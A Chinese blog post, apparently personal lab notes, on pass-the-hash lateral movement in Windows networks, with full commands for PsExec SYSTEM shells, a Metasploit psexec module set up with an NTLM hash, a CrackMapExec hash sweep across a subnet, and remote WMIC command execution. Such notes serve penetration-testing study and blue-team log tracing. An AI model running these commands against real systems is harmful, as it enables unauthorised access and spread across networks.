1. Toy模板网首页
  2. > Toy博客

内网横向之PTH

8月前 作者:Mauro_K 分类:Toy博客 阅读(30) 违法举报

这篇具有很好参考价值的文章主要介绍了内网横向之PTH。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

      内网横向之PTH,以前的笔记整理,方便查看翻找。本文包括PsExec、CrackMapExec和WMI。

一、PsExec

1.概念描述

     psexec 是 windows 官方自带的,不会存在查杀问题,属于 pstools 利用 PsExec 可以在远程计算机上执行命令,其基本原理是通过管道在远程目标主机上创建一个psexec 服务,并在本地磁盘中生成一个名为 PSEXESVC 的二进制文件,然后通过psexec 服务运行命令,运行结束后删除服务。利用 SMB 服务可以通过明文或 hash 传递来远程执行,条件 445 服务端口开放。对方开放 445 端口,就相当于开放了 smb 协议。

2.利用注意点

  • 需要远程系统开启 admin$ 共享(默认是开启的)
  • 因为 PsExec 连接的原理是基于 IPC 共享,因此目标需要开放 445 端口
  • 在使用 IPC$ 连接目标系统后,不需要输入账户和密码。
  • 在使用 PsExec 执行远程命令时,会在目标系统中创建一个 psexec 的服务, 命令执行完后,psexec服务将被自动删除。由于创建或删除服务时会产生 大量的日志,因此蓝队在溯源时可以通过日志反推攻击流程。
  • 使用 PsExec 可以直接获得 System 权限的交互式 Shell 的前提目标是 administrator 权限的 shell。
  • 在域环境测试时发现,非域用户无法利用内存中的票据使用 PsExec 功能, 只能依靠账号和密码进行传递。

3.靶机利用之第一种

     第一种直接利用psexec程序方式。

# 使用账号和明文密码
# 参数解释:
# -accepteula 第一次运行 PsExec 会弹出确认框,使用该参数就不会弹出确认框
# -s 以 System 权限运行远程进程,如果不用这个参数,就会获得一个对应用户权限的 shell
直接直接执行回显
# -u 域/用户名
# -p 密码/hash
PsExec64.exe /accepteula /s \\192.168.0.123 -u Administrator -p 123456 cmd.exe
PsExec64.exe  \\192.168.0.141 -u Administrator -p 123456 cmd.exe /c "ipconfig"

内网横向之PTH
内网横向之PTH

# 使用账号和hash
# 参数解释:
# -accepteula 第一次运行 PsExec 会弹出确认框,使用该参数就不会弹出确认框
# -s 以 System 权限运行远程进程,如果不用这个参数,就会获得一个对应用户权限的 shell
直接直接执行回显
# -u 域/用户名
# -p 密码/hash
PsExec.exe /accepteula /s \\192.168.0.141 -u Administrator -p 123456 cm
d /c "ipconfig

4.靶机利用之第二种

     1)第二种是Metasploit中的psexec模块。先利用hashdump获取hash。
内网横向之PTH     2)在MSF中搜索psexec,使用然后配置参数使用。

use exploit/windows/smb/psexec
set SMBUser Administrator
set rhosts 192.168.0.141
set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba885473
76818d4

内网横向之PTH
内网横向之PTH
内网横向之PTH

二、CrackMapExec

1.概念描述

     CrackMapExec 可以对 C 段中的主机进行批量 pth或者密码喷洒,项目地址:https://github.com/Porchetta-Industries/CrackMapExec。kali可以直接sudo apt install crackmapexec安装。

2.靶机利用

     对192.168.9.0/24 C 段进行批量 pass the hash。

crackmapexec smb 192.168.0.0/24 -u administrator -H 32ed87bdb5fdc5e9cba
88547376818d4

内网横向之PTH

三、WMI

1.概念描述

     WMI 全称 Windows Management Instrumentation 即 Windows 管理工具,Windows 98 以后的操作系统都支持 WMI。由于 Windows 默认不会将 WMI 的操作记录在日志里,同时现在越来越多的杀软将PsExec 加入了黑名单,因此 WMI 比 PsExec 隐蔽性要更好一些。

2.靶机利用

     WMI 连接远程主机,并使用目标系统的 cmd.exe 执行命令,将执行结果保存在目标主机 C 盘的 ip.txt 文件中。使用 WMIC 连接远程主机,需要目标主机开放 135 和 445 端口( 135 端⼝是 WMIC 默认的管理端⼝,wimcexec 使⽤445 端⼝传回显)。

wmic /node:192.168.0.123 /user:administrator /password:123456 process call create "cmd.exe /c ipconfig > c:\ip.txt

内网横向之PTH
     建立 IPC$ ,使用 type 读取执行结。
内网横向之PTH文章来源地址https://www.toymoban.com/news/detail-403738.html

到了这里,关于内网横向之PTH的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • 内网横向常用手法

    内网横向常用手法

    以下操作都是在我们知道用户和密码的情况下进行验证的,前期除了收集明文密码HASH等,还收集了用户名,用户名配合密码字典,进行上面的批量验证 关于IPC$+计划任务的横向,我们的目的非常明确: (1)首先建立向目标主机的IPC$连接 (2)其次把命令执行的脚本传到目标

    2023年04月09日
    浏览(31)
  • 内网渗透-内置工具横向移动

    内网渗透-内置工具横向移动

    前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动中工具的使用。 IPC+Schtasks(文件共享服务和定时任务) 利用条件: 开放了139,445端口 必须开启IPC$文件共享服务 需要目标机器的管理员账号和密码 hashdump load mimikatz 得到账号和密码 kerberos ssp wdigest net view

    2024年02月09日
    浏览(29)
  • 【内网安全】搭建网络拓扑,CS内网横向移动实验

    【内网安全】搭建网络拓扑,CS内网横向移动实验

    实验拓扑结构如下: **攻击者win10地址:**192.168.8.3 dmz win7地址: 10.9.75.49 172.16.1.1 **DC server2008地址:**172.16.1.254 CS服务器 kali: 10.9.75.171 1、搭建CS服务器,CS客户端连接 攻击者充当CS客户端连接 开启监听 生成木马 攻击者win10 攻击者访问dmz的Web服务器,上传一句话木马,蚁剑连

    2024年02月03日
    浏览(32)
  • 内网安全:IPC协议横向移动

    内网安全:IPC协议横向移动

    目录 网络拓扑图 网络环境说明 IPC协议 域渗透实战 域内信息收集:域控主机用户凭据网络 IPC协议横向移动 - 执行命令 一. 建立IPC连接 二. 拷贝执行文件到目标机器 三. 添加计划任务 IPC协议横向移动 - CS插件 IPC协议横向移动 - Impacket(常用) EXE版本测试  Py版本测试 - 代理

    2024年04月25日
    浏览(31)

  • 内网渗透(八)横向移不动

    这篇文章介绍内网渗透种的横向移动。 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基

    2023年04月23日
    浏览(33)
  • 内网环境横向移动——利用DCOM(2)

    内网环境横向移动——利用DCOM(2)

    PTH 部分基于 NTLM 认证进行攻击,而 PTT 基于 kerberos 协议进行攻击 PTT 中最常见的三种攻击方式为:MS14-068、黄金票据、白银票据 MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该

    2024年01月24日
    浏览(31)
  • 70内网安全-域横向内网漫游Socks代理隧道技术(下)

    70内网安全-域横向内网漫游Socks代理隧道技术(下)

              这节课解决代理的问题, 他是内网里面的穿透技术,隧道主要安全设备和流量监控的拦截问题,我们在做渗透的时候需要回显数据或者一些重要的信息,走的协议不一样,tcp/ip有七层, 在不同层里面有不同的协议,有一些协议会受到防火墙,过滤设备和流量检测

    2024年02月03日
    浏览(36)
  • 【内网安全-横向移动】WMI-WMIC命令&相关内网工具

    【内网安全-横向移动】WMI-WMIC命令&相关内网工具

    目录 一、WMI 1、简述:  1)官方介绍: 2)优点: 3)条件: 4)不足: 5)WMIC管理命令: 6)相关工具:  2、上线: 1、wmic 2、impacket-wmiexec 3、wmicmd.exe 4、WMIHACKER  1)官方介绍: WMI 具有 管理员 和 WMI 提供 程序编写器 使用的多个命令行工具 WMI 命令行工具 - Win32 apps | Micros

    2024年01月22日
    浏览(40)
  • 【内网安全-横向移动】IPC$连接--->计划任务--->上线

    【内网安全-横向移动】IPC$连接--->计划任务--->上线

    目录 一、信息收集(目标用户密码) 1、简述 1、收集信息充当字典 2、收集方法 二、横向移动 1、ipc$ 2、at命令 3、sc命令: 4、schtasks(计划任务) 三、利用示例 1、流程: 2、示例: 四、工具 1、cs插件---LSTAR - Aggressor 2、impacket-atexec 1、收集信息充当字典 1) 目标字典 :域内网

    2024年01月16日
    浏览(30)
  • 内网安全:横向传递攻击( RDP || Cobalt Strike )

    内网安全:横向传递攻击( RDP || Cobalt Strike )

    横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.( 传递攻击主

    2024年02月10日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包